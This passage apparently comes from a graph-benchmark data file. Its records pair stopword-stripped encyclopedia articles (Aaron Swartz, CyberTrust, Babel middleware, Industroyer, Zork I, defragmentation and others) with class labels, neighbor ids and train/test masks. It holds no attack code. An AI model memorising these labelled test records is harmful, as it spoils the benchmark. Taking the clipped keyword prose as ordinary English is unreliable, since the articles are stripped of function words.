    "text": "Aaron_Swartz:aaron swartz aaron hillel swartz november 8 1986january 11 2013 american computer programmer entrepreneur writer political organizer internet hacktivist involved development web feed format rss markdown publishing format organization creative commons website framework web.py co-founder social news site reddit given title co-founder combinator owner paul graham formation bug inc. merger swartz project infogami company run alexis ohanian steve huffman swartz work also focused civic awareness activism helped launch progressive change campaign committee 2009 learn effective online activism 2010 became research fellow harvard university safra research lab institutional corruption directed lawrence lessig founded online group demand progress known campaign stop online piracy act 2011 swartz arrested massachusetts institute technology mit police state breaking-and-entering charges connecting computer mit network unmarked unlocked closet setting download academic journal articles systematically jstor using guest user account issued mit federal prosecutors later charged two counts wire fraud eleven violations computer fraud abuse act carrying cumulative maximum penalty 1 million fines 35 years prison asset forfeiture restitution supervised release swartz declined plea bargain would served six months federal prison two days prosecution rejected counter-offer swartz found dead brooklyn apartment hanged 2013 swartz inducted posthumously internet hall fame swartz born highland park illinois suburb chicago eldest son jewish parents susan robert swartz brother noah benjamin father founded software firm mark williams company swartz immersed study computers programming internet internet culture attended north shore country day school small private school near chicago 9th grade swartz left high school 10th grade enrolled courses chicago area college 1999 13 years old created website theinfo.org collaborative online library theinfo.org made swartz winner arsdigita prize given young people create useful educational collaborative noncommercial websites age 14 became member working group authored rss 1.0 web syndication specification swartz attended stanford university dropped first year swartz first year stanford applied combinator first summer founders program proposing work startup called infogami designed flexible content management system allow creation rich visually interesting websites form wiki structured data working infogami co-founder simon carstensen summer 2005 aaron opted return stanford choosing instead continue develop seek funding infogami part work infogami swartz created web.py web application framework unhappy available systems python programming language early fall 2005 swartz worked fellow co-founders another nascent y-combinator firm reddit rewrite reddit lisp codebase using python web.py although infogami platform abandoned bug acquired infogami software used support internet archive open library project web.py web framework used basis many projects swartz many others infogami failed find funding y-combinator organizers suggested infogami merge reddit november 2005 resulting formation new firm bug devoted promoting products result merger swartz given title co-founder reddit although projects initially struggled gain traction reddit began make large gains popularity 2005 2006 october 2006 based largely success reddit bug acquired condé nast publications owner wired magazine swartz moved company san francisco work wired swartz found office life uncongenial ultimately left company september 2007 swartz joined infogami co-founder simon carstensen launch new firm jottit another attempt create another markdown driven content management system python 2008 swartz founded watchdog.net good government site teeth aggregate visualize data politicians year wrote widely circulated guerilla open access manifesto december 27 2010 swartz filed freedom information act foia request learn treatment chelsea manning alleged source wikileaks 2008 swartz downloaded 2.7 million federal court documents stored pacer public access court electronic records database managed administrative office united states courts huffington post characterized actions way swartz downloaded public court documents pacer system effort make available outside expensive service move drew attention fbi ultimately decided press charges documents fact public pacer charging 8 cents per page information carl malamud founded nonprofit group public.resource.org contended free federal documents covered copyright fees plowed back courts finance technology system ran budget surplus 150 million according court reports reported new york times pacer used technology designed bygone days screechy telephone modems ... putting nation legal system behind wall cash kludge malamud appealed fellow activists urging visit one 17 libraries conducting free trial pacer system download court documents send public distribution reading malamud call action swartz used perl computer script running amazon cloud servers download documents using credentials belonging sacramento library september 4 20 2008 accessed documents uploaded cloud computing service released documents malamud organization september 29 2008 gpo suspended free trial pending evaluation program swartz actions subsequently investigated fbi case closed two months charges filed swartz learned details investigation result filing foia request fbi described response usual mess confusions shows fbi lack sense humor pacer still charges per page customers using firefox option saving documents free public access plug-in called recap 2013 memorial swartz malamud recalled work pacer brought millions u.s. district court records behind pacer pay wall said found full privacy violations including medical records names minor children confidential informants malamud penned detailed account collaboration swartz pacer project essay appears website writing ars technica timothy lee later made use documents obtained swartz co-creator recap offered insight discrepancies reporting much data swartz downloaded back-of-the-envelope calculation days offsite crawl shut swartz guessed got around 25 percent documents pacer new york times similarly reported swartz downloaded estimated 20 percent entire database based facts swartz downloaded 2.7 million documents pacer time contained 500 million lee concluded swartz downloaded less one percent database 2009 wanting learn effective activism swartz helped launch progressive change campaign committee wrote blog spend days experimenting new ways get progressive policies enacted progressive politicians elected swartz led first activism event career progressive change campaign committee delivering thousands honor kennedy petition signatures massachusetts legislators asking fulfill former senator ted kennedy last wish appointing senator vote health care reform 2010 swartz co-founded demand progress political advocacy group organizes people online take action contacting congress leaders funding pressure tactics spreading word civil liberties government reform issues academic year 2010–11 swartz conducted research studies political corruption lab fellow harvard university edmond j. safra research lab institutional corruption author cory doctorow novel homeland drew advice swartz setting protagonist could use information available voters create grass-roots anti-establishment political campaign afterword novel swartz wrote political hacktivist tools used anyone motivated talented enough ... change system ... let know help swartz involved campaign prevent passage stop online piracy act sopa sought combat internet copyright violations criticized basis would made easier u.s. government shut web sites accused violating copyright would placed intolerable burdens internet providers following defeat bill swartz keynote speaker f2c freedom connect 2012 event washington d.c. may 21 2012 speech titled stopped sopa informed audience added fight everyone made hero story everyone took job save crucial freedom referring series protests bill numerous websites described electronic frontier foundation biggest internet history 115,000 sites altering webpages swartz also presented topic event organized thoughtworks swartz participated wikipedia august 2003 2006 ran unsuccessfully wikimedia foundation board trustees 2006 swartz wrote analysis wikipedia articles written concluded bulk actual content comes tens thousands occasional contributors outsiders made contributions site core group 500 1,000 regular editors tend correct spelling formatting errors according swartz formatters aid contributors way around conclusions based analysis edit histories several randomly selected articles contradicted opinion wikipedia co-founder jimmy wales believed core group regular editors providing content thousands others contributed formatting issues swartz came conclusions counting total number characters added editor particular article wales counted total number edits aaron swartz noted knowledge produced public universities financed us government graduate students released free public instead copyrighted benefits given authors privatized locked for-profit corporations invest public works instead earned billions us dollars year private publishers since publications repackaged academic databases university libraries pay thousands dollars subscribe students access content swartz used full text scholarly online databases jstor accessed mit network order download books journals etc produced thanks public funds paid money collected taxpayers according state federal authorities swartz used jstor digital repository download large number academic journal articles mit computer network course weeks late 2010 early 2011 time swartz research fellow harvard university provided jstor account visitors mit open campus authorized access jstor network authorities said swartz downloaded documents laptop connected networking switch controlled-access wiring closet mit door closet kept unlocked according press reports discovered video camera placed room film swartz swartz computer left untouched video captured swartz download stopped swartz identified rather pursue civil lawsuit june 2011 reached settlement wherein surrendered downloaded data september 25 2010 ip address 18.55.6.215 part mit network began sending hundreds pdf download requests per minute affecting performance entire jstor site prompted block ip address morning another ip address also within mit network began sending jstor pdf download requests resulting temporary full block firewall level mit servers entire 18.0.0.0/8 range email sent mit describing situation email sent september 29 2010 one jstor employee wrote mit july 30 2013 jstor released 300 partially redacted documents provided incriminating evidence aaron swartz documents originally sent united states attorney office response subpoenas case united states v. aaron swartz following images excerpts 3,461-page pdf document night january 6 2011 swartz arrested near harvard campus mit police united states secret service agent arraigned cambridge district court two state charges breaking entering intent commit felony july 11 2011 swartz indicted federal grand jury charges wire fraud computer fraud unlawfully obtaining information protected computer recklessly damaging protected computer november 17 2011 swartz indicted middlesex county superior court grand jury state charges breaking entering intent grand larceny unauthorized access computer network december 16 2011 state prosecutors filed notice dropping two original charges charges listed november 17 2011 indictment dropped march 8 2012 according spokesperson middlesex county prosecutor state charges dropped permit federal prosecution headed stephen p. heymann supported evidence provided secret service agent michael s. pickett proceed unimpeded september 12 2012 federal prosecutors filed superseding indictment adding nine felony counts increased swartz maximum criminal exposure 50 years imprisonment 1 million fines plea negotiations swartz attorneys prosecutors offered recommend sentence six months low-security prison swartz would plead guilty 13 federal crimes swartz lead attorney rejected deal opting instead trial prosecutors would forced justify pursuit swartz federal prosecution involved characterized numerous critics former nixon white house counsel john dean overcharging 13-count indictment overzealous prosecution alleged computer crimes brought former u.s. attorney massachusetts carmen ortiz swartz died suicide january 11 2013 death federal prosecutors dropped charges december 4 2013 due freedom information act suit investigations editor wired magazine several documents related case released secret service including video swartz entering mit network closet evening january 11 2013 swartz found dead brooklyn apartment partner taren stinebrickner-kauffman spokeswoman new york medical examiner reported hanged suicide note found swartz family partner created memorial website issued statement saying used prodigious skills programmer technologist enrich make internet world fairer better place days swartz funeral lawrence lessig eulogized friend sometime-client essay prosecutor bully decried disproportionality swartz prosecution said question government needs answer necessary aaron swartz labeled 'felon 18 months negotiations willing accept cory doctorow wrote aaron unbeatable combination political insight technical skill intelligence people issues think could revolutionized american worldwide politics legacy may still yet swartz funeral services held january 15 2013 central avenue synagogue highland park illinois tim berners-lee creator world wide web delivered eulogy day wall street journal published story based part interview stinebrickner-kauffman told journal swartz lacked money pay trial hard ... make part life go public asking help also distressed said two friends subpoenaed longer believed mit would try stop prosecution several memorials followed soon afterward january 19 hundreds attended memorial cooper union speakers included stinebrickner-kauffman open source advocate doc searls creative commons glenn otis brown journalist quinn norton roy singham thoughtworks david segal demand progress january 24 memorial internet archive speakers including stinebrickner-kauffman alex stamos brewster kahle carl malamud february 4 memorial held cannon house office building capitol hill speakers memorial included senator ron wyden representatives darrell issa alan grayson jared polis lawmakers attendance included senator elizabeth warren representatives zoe lofgren jan schakowsky memorial also took place march 12 mit media lab swartz family recommended givewell donations memory organization swartz admired collaborated sole beneficiary january 12 2013 swartz family partner issued statement criticizing prosecutors mit speaking son funeral january 15 robert swartz said aaron killed government mit betrayed basic principles tom dolan husband u.s. attorney massachusetts carmen ortiz whose office prosecuted swartz case replied criticism swartz family truly incredible son obit blame others death make mention 6-month offer comment triggered criticism esquire writer charlie pierce replied glibness husband defenders toss 'mere six months federal prison low-security indication something seriously whack way prosecutors think days mit maintains open-campus policy along open network two days swartz death mit president l. rafael reif commissioned professor hal abelson lead analysis mit options decisions relating swartz legal struggles help guide fact-finding stage review mit created website community members could suggest questions issues review address swartz attorneys requested pretrial discovery documents made public move mit opposed swartz allies criticized mit opposition releasing evidence without redactions july 26 2013 abelson panel submitted 182-page report mit president l. rafael reif authorized public release july 30 panel reported mit supported charges swartz cleared institution wrongdoing however report also noted despite mit advocacy open access culture institutional level beyond university never extended support swartz report revealed example mit considered possibility issuing public statement position case statement never materialized huffington post reported ortiz faced significant backlash pursuing case swartz including petition white house fired news outlets reported similarly reuters news agency called swartz online icon help ed make virtual mountain information freely available public including estimated 19 million pages federal court documents associated press ap reported swartz case highlights society uncertain evolving view treat people break computer systems share data enrich make available others jstor lawyer former u.s. attorney southern district new york mary jo white asked lead prosecutor drop charges discussed editor hrag vartanian hyperallergic brooklyn new york muralist bamn means necessary created mural swartz swartz amazing human fought tirelessly right free open internet artist explained much 'reddit guy speaking april 17 2013 yuval noah harari described swartz first martyr freedom information movement aaron swartz legacy reported strengthening open access scholarship movement illinois home state swartz influence led state university faculties adopt policies favor open access january 13 2013 members anonymous hacked two websites mit domain replacing tributes swartz called members internet community use death rallying point open access movement banner included list demands improvements u.s. copyright system along swartz guerilla open access manifesto night january 18 2013 mit e-mail system taken offline ten hours january 22 e-mail sent mit redirected hackers aush0k tibitximer korea advanced institute science technology traffic mit redirected computer harvard university publishing statement headed r.i.p aaron swartz text 2009 posting swartz accompanied chiptunes version star-spangled banner mit regained full control seven hours early hours january 26 2013 u.s sentencing commission website ussc.gov hacked anonymous home page replaced embedded youtube video anonymous operation last resort video statement said swartz faced impossible choice hacker downloaded hundreds thousands scientific-journal articles swiss publisher website republished open web swartz honor week first anniversary death swartz death 50,000 people signed online petition white house calling removal ortiz overreach case aaron swartz similar petition submitted calling prosecutor stephen heymann firing january 2015 two years swartz death white house declined petitions august 3 2013 swartz posthumously inducted internet hall fame hackathon held swartz memory around date birthday 2013 weekend november 8–10 2013 inspired swartz work life second annual hackathon held least 16 cities around world preliminary topics worked 2013 aaron swartz hackathon privacy software tools transparency activism access legal fixes low-cost book scanner january 2014 lawrence lessig led walk across new hampshire honor swartz rallying campaign finance reform 2017 turkish-dutch artist ahmet öğüt commemorated swartz work entitled information power people depicting bust long-time supporter open access swartz wrote guerilla open access manifesto supporters swartz responded news death effort called pdftribute promote open access january 12 eva vivalt development economist world bank began posting academic articles online using hashtag pdftribute tribute swartz scholars posted links works story aaron swartz exposed topic open access scientific publications wider audiences wake aaron swartz many institutions personalities campaigned open access scientific knowledge swartz death prompted calls open access scholarly data e.g. open science data think computer foundation center information technology policy citp princeton university announced scholarships awarded memory aaron swartz 2013 swartz posthumously awarded american library association james madison award outspoken advocate public participation government unrestricted access peer-reviewed scholarly articles march editor editorial board journal library administration resigned en masse citing dispute journal publisher routledge one board member wrote crisis conscience publishing journal open access death aaron swartz 2002 swartz stated died wanted contents hard drives made publicly available coalition consortium launched european research council continues fight aaron swartz make available 2020 scientific publications financed member states coalition several members u.s. house representatives – republican darrell issa democrats jared polis zoe lofgren – house judiciary committee raised questions regarding government handling case calling charges ridiculous trumped polis said swartz martyr whose death illustrated need congress limit discretion federal prosecutors speaking memorial swartz capitol hill issa said massachusetts democratic senator elizabeth warren issued statement saying aaron advocacy internet freedom social justice wall street reform demonstrated ... power ideas ... letter attorney general eric holder texas republican senator john cornyn asked basis u.s. attorney district massachusetts conclude office conduct 'appropriate prosecution mr. swartz way retaliation exercise rights citizen freedom information act issa chairs house committee oversight government reform announced would investigate justice department actions prosecuting swartz statement huffington post praised swartz work toward open government free access people issa investigation garnered bipartisan support january 28 2013 issa ranking committee member elijah cummings published letter u.s. attorney general holder questioning federal prosecutors filed superseding indictment february 20 wbur reported ortiz expected testify upcoming oversight committee hearing office handling swartz case february 22 associate deputy attorney general steven reich conducted briefing congressional staffers involved investigation told swartz guerilla open access manifesto played role prosecutorial decision-making congressional staffers left briefing believing prosecutors thought swartz convicted felony carrying least short prison sentence order justify filed case first place excoriating department justice department vengeance stinebrickner-kauffman told guardian doj erred relying swartz guerilla open access manifesto accurate indication beliefs 2010 longer single issue activist said lots things healthcare climate change money politics march 6 holder testified senate judiciary committee case good use prosecutorial discretion stinebrickner-kauffman issued statement reply repeating amplifying claims prosecutorial misconduct public documents wrote reveal prosecutor stephen heymann instructed secret service seize hold evidence without warrant ... lied judge fact written briefs ... withheld exculpatory evidence ... year violating legal ethical obligations turn evidence defense march 22 senator al franken wrote holder letter expressing concerns writing charging young man like mr. swartz federal offenses punishable 35 years federal imprisonment seems remarkably aggressive – particularly appears one principal aggrieved parties ... support criminal prosecution 2013 rep. zoe lofgren d-calif. introduced bill aaron law exclude terms service violations 1986 computer fraud abuse act wire fraud statute lawrence lessig wrote bill critically important change ... cfaa hook government bullying ... law would remove hook single line longer would felony breach contract professor orin kerr specialist nexus computer law criminal law wrote arguing precisely sort reform act years aclu called reform cfaa remove dangerously broad criminalization online activity eff mounted campaign reforms lessig inaugural chair lecture furman professor law leadership entitled aaron laws law justice digital age dedicated lecture swartz aaron law bill stalled committee brian knappenberger alleges due oracle corporation financial interest maintaining status quo fair access science technology research act fastr bill would mandate earlier public release taxpayer-funded research fastr described aaron law senator ron wyden d-ore. senator john cornyn r-tex introduced senate version 2013 2015 bill introduced house reps. zoe lofgren d-calif. mike doyle d-pa. kevin yoder r-kans. senator wyden wrote bill fastr act provides access taxpayer funded research never hidden behind paywall legislation passed helped prompt motion toward open access part us administration shortly bill original introduction office science technology policy directed federal agency 100 million annual conduct research development expenditures develop plan support increased public access results research funded federal government swartz featured received dedications numerous art work 2013 kenneth goldsmith dedicated printing internet exhibition swartz fate aaron swartz also featured conservative filmmaker dinesh d'souza 2014 documentary wherein d'souza compares swartz prosecution conviction violating campaign finance laws alleges cases exemplify selective overzealous prosecution also dedicated biographical films aaron january 11 2014 marking first anniversary death preview released internet boy story aaron swartz documentary swartz nsa sopa film officially released january 2014 sundance film festival democracy covered release documentary well swartz life legal case sprawling interview director brian knappenberger swartz father brother attorney documentary released creative commons license debuted theaters on-demand june 2014 mashable called documentary powerful homage aaron swartz debut sundance received standing ovation mashable printed help experts internet boy makes clear argument swartz unjustly became victim rights freedoms stood hollywood reporter described heartbreaking story tech wunderkind persecuted us government must-see anyone knows enough care way laws govern information transfer digital age october 2014 killswitch film featuring aaron swartz well lawrence lessig tim wu edward snowden received world premiere woodstock film festival award best editing film focuses swartz role advocating internet freedoms february 2015 killswitch invited screen capitol visitor center washington d.c. congressman alan grayson event held eve federal communications commission historic decision net neutrality congressman grayson lawrence lessig free press ceo craig aaron spoke swartz fight behalf free open internet event congressman grayson states killswitch one honest accounts battle control internet – access information richard von busack metro silicon valley writes killswitch lapidary use found footage side atomic café fred swegles orange county register remarks anyone values unfettered access online information apt captivated killswitch gripping fast-paced documentary kathy gill geekwire asserts killswitch much dry recitation technical history director ali akbarzadeh producer jeff horn writer chris dollar created human-centered story large part connection comes lessig relationship swartz patriot web independent biographical film aaron swartz written directed darius burke set released august 2019 amazon film limited video demand release december 2017 reelhouse january 2018 pivotshare another biographical film swartz think aaron developed hbo films swartz identified cofounder reddit title source controversy merger infogami reddit swartz became co-owner director parent company bug inc. along reddit cofounders steve huffman alexis ohanian swartz referred cofounder press investor paul graham recommended merger ohanian describes co-owner",
    "neighbors": [
      3336,
      268,
      4752,
      3223,
      8735,
      8998,
      3495,
      11437,
      11695,
      2864,
      5426,
      8627,
      9780,
      8373,
      441,
      959,
      6352,
      10452,
      11221,
      5078,
      472,
      8921,
      4194,
      6502,
      743,
      3817,
      8554,
      9845,
      119,
      7547,
      124
    ],
    "mask": "Test"
  },
  {
    "node_id": 11660,
    "label": 4,
    "text": "CyberTrust:cybertrust cybertrust security services company formed virginia november 2004 merger trusecure betrusted cybertrust acquired large stake ubizen european security services firm based belgium become one largest information security firms world acquired verizon business 2007 2015 cybertrust root certificates acquired digicert inc. leading global certificate authority ca provider trusted identity authentication services cybertrust founded subsidiary gte corporation government systems information security directorate focused security services electronic commerce included authentication privacy integrity non-repudiation using public key encryption technology 2000 gte sold cybertrust ireland-based security company baltimore technologies 150 million 2003 baltimore technologies divested operating companies including digital certificate operations betrusted holdings inc. year later september 2004 betrusted announced intention merge former competitor trusecure corporation november resulting company incorporated virginia cybertrust verizon business acquired cybertrust 2007 reuniting former parent verizon created merger gte bell atlantic financial terms disclosed 2015 cybertrust root certificates acquired digicert inc. leading global certificate authority ca provider trusted identity authentication services financial terms disclosed cybertrust used majority shareholding dilute remaining ubizen shares forcing acquire remaining shares delist ubizen 2005 betrusted originally created pwc sold one equity partners division bank 1 one equity partners also purchased 90 east securenet bought pki component baltimore gateway operations isecure acquisition cybertrust root certificates makes digicert second-largest certificate authority ca high-assurance ssl certificates part deal digicert assume management cybertrust/verizon trusted roots intermediate certificates verizon continue offer ssl certificates reseller digicert pursuant digicert ’ acquiring verizon enterprise ssl business digicert announce partnership cybertrust japan expand market presence asia new partnership digicert cybertrust japan also announce cyber secure asia wholly owned subsidiary cybertrust japan market digicert ’ certificate technology southeast asia regional headquarters singapore",
    "neighbors": [
      7075,
      9744,
      9394,
      5433,
      5373
    ],
    "mask": "Test"
  },
  {
    "node_id": 11661,
    "label": 9,
    "text": "Babel_Middleware:babel middleware babel open source middleware system serving scientific computing community language interoperability tool babel enables arbitrary mixing software libraries written c/c++ fortran python java distributed computing platform babel provides language-neutral remote method invocation rmi scheme similar java rmi allows third-party plug-ins specify custom data encodings network protocols babel requires developers use interface description language specify platform language neutral interface code babel uses custom dialect called sidl scientific interface definition language adaptations specific computational science engineering applications babel tool parses sidl specification generate source code provides glue programming languages babel works known posix unix variants including linux mac os x aix irix solaris tru64 cray xt4 ibm blue gene many commodity clusters babel require special compiler linker technology works gnu intel ibm pathscale pgi many compilers babel distributed lgpl license babel r 100 award 2006 used diverse computational applications accelerator beam dynamics cell biology chemistry climate electron effects fusion geomagnetics materials nuclear power plants radio astronomy subsurface transport well infrastructure frameworks meshing solvers sparse linear algebra sourcecode refactoring babel also redistributed customer applications cca framework debian linux babel started internal research project software components lawrence livermore national laboratory 1999 first public alpha release babel 2001 also 2001 secured funding scidac scientific discovery advanced computing along collaborators cca forum common component architecture forum babel development maintenance currently funded united states department energy relies heavily open source community contributors hail sandia national laboratories argonne national laboratory oak ridge national laboratory tech-x corp mit university utah babel development team maintain open software repositories mailing lists issue trackers",
    "neighbors": [
      10465,
      8554,
      5612,
      1933,
      823,
      5677,
      7983,
      2481,
      10641,
      2804,
      2135,
      3960,
      8122,
      3323,
      2045,
      1823
    ],
    "mask": "Test"
  },
  {
    "node_id": 11662,
    "label": 4,
    "text": "Industroyer:industroyer industroyer also referred crashoverride malware framework considered used cyberattack ukraine ’ power grid december 17 2016 attack cut fifth kiev capital power one hour considered large-scale test time fourth malware publicly revealed target industrial control systems stuxnet havex blackenergy malware discovered slovak internet security company eset eset cybersecurity companies detect name “ industroyer ” cybersecurity firm dragos named malware “ crashoverride ” detailed analysis industroyer revealed malware designed disrupt working processes industrial control systems specifically used electrical substations industroyer modular malware main components following",
    "neighbors": [
      5665,
      3843,
      131,
      107,
      11409,
      9688,
      5337,
      7515
    ],
    "mask": "Test"
  },
  {
    "node_id": 11663,
    "label": 6,
    "text": "Dsw_(command):dsw command codice_1 unix command enabled deletion files non-typeable characters replaced functionality implemented codice_2 namely codice_3",
    "neighbors": [
      515,
      9733,
      9735,
      3976,
      4750,
      2198,
      6812,
      7847,
      4398,
      7983,
      1336,
      7356,
      965,
      8522,
      3659,
      9946,
      6120,
      4850,
      5492,
      9204,
      6138,
      5759
    ],
    "mask": "Test"
  },
  {
    "node_id": 11664,
    "label": 4,
    "text": "McAfee_Change_Control:mcafee change control mcafee change control commercial file integrity monitoring solution windows- linux-based systems developed mcafee",
    "neighbors": [
      704,
      6372,
      6797,
      7983,
      823
    ],
    "mask": "None"
  },
  {
    "node_id": 11665,
    "label": 9,
    "text": "CaPSL:capsl capsl printer command language/page description language used early canon printers including lbp-8iii series supported least lbp-8iv printers language discontinued later canon printers implementing pcl also called lips lips4 windows spool file could contain raw capsl data",
    "neighbors": [
      8262,
      6830
    ],
    "mask": "Train"
  },
  {
    "node_id": 11666,
    "label": 3,
    "text": "Zork_I:zork zork great underground empire part later known zork interactive fiction video game written marc blank dave lebling bruce daniels tim anderson published infocom 1980 first game zork trilogy released wide range computer systems followed zork ii zork iii infocom first game sold 378,000 copies 1986 game takes place zork calendar year 948 gue although passage time notable gameplay player steps deliberately vague role adventurer game begins near white house small self-contained area although player given little instruction house provides obvious point interest player enters house yields number intriguing objects including brass battery-powered lantern empty trophy case elvish sword great antiquity beneath rug trap door leads dark cellar revealed one several entrances vast subterranean land known great underground empire player soon encounters colorful host dangerous enemies including deadly grues prey victims dark axe-wielding troll giant cyclops flees terror mention odysseus vampire bat drop player anywhere mine encountered evil spirits guarding entrance hades nimble-fingered thief armed stiletto makes mapping maze difficult removing scattering items player might drop leave trail ultimate goal zork collect twenty treasures zork install trophy case finding treasures requires solving variety puzzles navigation two complex mazes intricate manipulations flood control dam 3 placing treasures trophy case scores player 350 points grants rank master adventurer ancient map instructions magically appears trophy case instructions provide access stone barrow entrance barrow end zork beginning zork ii 28 ways player die possible score 350 points 223 moves win game completely 228 moves exploiting bug infocom begin tradition including feelies extra items related game 1982 release deadline later re-releases game however packaged although back zork grey box depicted zorkmid coin included feelies production difficulties led coins omission packages zorkmid coins included feelies release zork trilogy boxed set original version zork published personal software simply called zork distributed clear plastic bags containing game disk 36-page booklet infocom first self-published version zork so-called folio format included single piece paper describing run game feelies noted introduced zork re-released grey box format opening text zork among notable descriptions video games quite simplistic compared infocom later games many started screens full introductory text several game situations descriptions become iconic within field interactive fiction brass lantern elvish sword great antiquity zork also introduced notable grue sinister lurking presence kills adventurers go exploring dark grues appeared least mentioned many subsequent infocom adventures right 1997 graphic adventure zork grand inquisitor published activision zork sales surprised infocom rising falling time many dealers sold game essential accessory purchasing new computers including dec rainbow ti professional others people see game machines best-selling game 1982 32,000 copies sold first half year almost 100,000 copies 1983 — inc. reported game best seller four years—more 150,000 copies 1984 comprising 20 infocom sales year total 378,987 copies 1986 infoworld reported april 1984 zork returned top sales charts two years release based sales market-share data video listed fifth magazine list best selling video games february march 1985 ii computing listed zork fourth magazine overall list top apple ii software october–november 1985 first games list byte declared 1981 single advance science adventure bold exciting zork magazine praised sophisticated parser quality writing stating program entertaining eloquent witty precisely written almost beside point ... zork felt touched— experienced will—through care attention detail authors rendered concluded somebody please let know sequel done jerry pournelle wrote magazine 1983 played game sons stating liked adventure wanted solved colossal cave guarantee 'll love zork jon mishcon reviewed zork space gamer 40 mishcon commented absence graphics game weak points find although price expensive believe first rate game well worth every penny 80 micro called zork complicated sophisticated ... joy play praised documentation take rank amateur instructions clear easy follow wondered game could solved program lets pretty much want even consequences much less desirable leaves open marvelous opportunities magazine concluded hoping expect second part sometime soon addison-wesley book atari software 1984 gave game overall a+ rating calling definitive adventure game 1992 computer gaming world added zork hall fame waiving normal criteria favor honoring venerable classic 1996 magazine listed zork 13 among top 150 best games all-time editors wrote seminal infocom text adventure combined challenging puzzles wonderful descriptive prose touch humor create rich universe existed svga graphics within head march 12 2007 new york times reported named list ten important video games time so-called game canon library congress took video game preservation proposal began games list including zork zork one five infocom games re-released solid gold format in-game hints infocom allowed distribution early fortran version therefore source code available various public domain software ports available various repositories also abridged version called mini-zork dated november 24 1987 mini-zork released free charge promotion german language version developed never released unfinished version story file dated january 13 1988 made way public circulation german evidently non-native containing many spelling grammar errors known jeff o'neill worked version remastered version first released japanese software development company systemsoft nec pc-9801 march 1991 differences enhanced remake game recognizes verb commands typed kana japanese syllable system latin alphabet convenience common verb commands look take etc accessed pressing corresponding button player still type name object remake also helps player interact environment displaying list objects player typed command also unlike original remake contains enhanced graphics especially list objects text super-imposed another remastered version released activision shoeisha japan sega saturn playstation 1996 version also includes graphics interfaces lucasfilm legend early entries particular sound effects auto-mapping music yuzo koshiro neither version ever released outside japan game playable code zork mason main character needs get chair playstation 3 xbox 360 users need pull l2 r2 lt rt xbox 360 rapidly windows players need press space bar rapidly wii players must shake controls wiimote nunchuck control scheme mason gets chair must walk left use old computer behind chair play zork type zork command prompt achievement/trophy also awarded putting code",
    "neighbors": [
      6976,
      577,
      8937,
      7116,
      9006,
      1265,
      625,
      627,
      10931,
      3960,
      4409,
      8474
    ],
    "mask": "None"
  },
  {
    "node_id": 11667,
    "label": 6,
    "text": "Defragmentation:defragmentation maintenance file systems defragmentation process reduces degree fragmentation physically organizing contents mass storage device used store files smallest number contiguous regions fragments also attempts create larger regions free space using compaction impede return fragmentation defragmentation utilities try keep smaller files within single directory together often accessed sequence defragmentation advantageous relevant file systems electromechanical disk drives hard disk drives floppy disk drives optical disk media movement hard drive read/write heads different areas disk accessing fragmented files slower compared accessing entire contents non-fragmented file sequentially without moving read/write heads seek fragments fragmentation occurs file system allocate enough contiguous space store complete file unit instead puts parts gaps existing files usually gaps exist formerly held file file system subsequently deleted file system allocated excess space file first place files often appended log files well frequent adding deleting files emails web browser cache larger files videos greater numbers files contribute fragmentation consequent performance loss defragmentation attempts alleviate problems consider following scenario shown image right otherwise blank disk five files e using 10 blocks space section block allocation unit filesystem block size set disk formatted size supported filesystem blank disk files would allocated one see example 1 image file b deleted would two options mark space file b empty used later move files b empty space end since moving files could time consuming many files needed moved usually empty space simply left marked table available new files see example 2 image new file f allocated requiring 6 blocks space could placed first 6 blocks space formerly held file b 4 blocks following remain available see example 3 image another new file g added needs 4 blocks could occupy space f c example 4 image however file f needs expanded three options since space immediately following longer available additionally concept “ fragmentation ” limited individual files multiple extents disk instance group files normally read particular sequence like files accessed program loading include certain dlls various resource files audio/visual media files game considered fragmented sequential load-order disk even individual files fragmented read/write heads seek non-fragmented files randomly access sequence groups files may originally installed correct sequence drift apart time certain files within group deleted updates common cause order update file updaters usually delete old file first write new updated one place however filesystems write new file physical place disk allows unrelated files fill empty spaces left behind defragment disk defragmentation software also known defragmenter move files around within free space available intensive operation performed filesystem little free space defragmentation system performance degraded best leave computer alone process defragmenter get confused unexpected changes filesystem depending algorithm used may may advantageous perform multiple passes reorganization involved defragmentation change logical location files defined location within directory structure besides defragmenting program files defragmenting tool also reduce time takes load programs open files example windows 9x defragmenter included intel application launch accelerator optimized programs disk placing defragmented program files dependencies next order program loads load programs faster windows good defragmenter read prefetch files identify many file groups possible place files within access sequence beginning hard drive outer tracks higher data transfer rate inner tracks placing frequently accessed files onto outer tracks increases performance third party defragmenters mydefrag move frequently accessed files onto outer tracks defragment files improvements modern hard drives ram cache faster platter rotation speed command queuing scsi/ata tcq sata ncq greater data density reduce negative impact fragmentation system performance degree though increases commonly used data quantities offset benefits however modern systems profit enormously huge disk capacities currently available since partially filled disks fragment much less full disks high-capacity hdd partition occupies smaller range cylinders resulting faster seeks however average access time never lower half rotation platters platter rotation measured rpm speed characteristic hdds experienced slowest growth decades compared data transfer rate seek time minimizing number seeks remains beneficial storage-heavy applications defragmentation ensuring one seek per file counting seeks non-adjacent tracks common strategy optimize defragmentation reduce impact fragmentation partition hard disk way separates partitions file system experience many reads writes volatile zones files created deleted frequently directories contain users profiles modified constantly especially temp directory web browser cache creating thousands files deleted days files user profiles held dedicated partition commonly done unix recommended files systems typically stored /var partition defragmenter runs better since need deal static files directories partitions relatively little write activity defragmentation time greatly improves first defragmentation since defragmenter need defragment small number new files future presence immovable system files especially swap file impede defragmentation files safely moved operating system use example ntfsresize moves files resize ntfs partition tool pagedefrag could defragment windows system files swap file files store windows registry running boot time gui loaded since windows vista feature fully supported updated ntfs files added disk master file table mft must grow store information new files every time mft extended due file way mft gain fragment early versions windows could safely defragmented partition mounted microsoft wrote hardblock defragmenting api however since windows xp increasing number defragmenters able defragment mft windows defragmentation api improved supports move operation even improvements first four clusters mft remain unmovable windows defragmentation api resulting fact defragmenters store mft two fragments first four clusters wherever placed disk formatted rest mft beginning disk wherever defragmenter strategy deems best place reading data conventional electromechanical hard disk drive disk controller must first position head relatively slowly track given fragment resides wait disk platter rotates fragment reaches head solid-state drive ssd based flash memory moving parts random access file fragment flash memory suffer delay making defragmentation optimize access speed unnecessary furthermore since flash memory written limited number times fails defragmentation actually detrimental except mitigation catastrophic failure however windows still defragments ssd automatically albeit less vigorously prevent file system reaching maximum fragmentation tolerance maximum fragmentation limit reached subsequent attempts write disk fail 2010 discovered operation mydefrag utility old backup copies created system restore known checkpoints deleted mydefrag developer jeroen kessels blamed windows api shadow copy shadow copy service system restore uses tracks changes disks remembers according kessels shadow copy sees defragmentation operation data changes opposed blocks moved tries record 